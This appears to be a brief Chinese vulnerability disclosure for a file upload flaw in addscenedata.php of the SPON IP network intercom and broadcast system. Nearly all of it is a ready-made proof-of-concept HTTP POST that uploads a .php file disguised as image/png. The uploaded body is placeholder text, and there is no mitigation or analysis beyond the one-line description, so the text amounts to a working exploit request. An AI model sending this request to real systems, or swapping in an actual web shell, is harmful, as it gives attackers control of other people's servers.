漏洞描述
世邦通信股份有限公司I SPON IP网络对讲广播系统 addscenedata.php 存在文件上传漏洞,攻击者可利用该漏洞获取服务器控制权限。
POST /php/addscenedata.php HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="upload"; filename="666666.php"
Content-Type: image/png
6666666666666666
------WebKitFormBoundary7MA4YWxkTrZu0gW--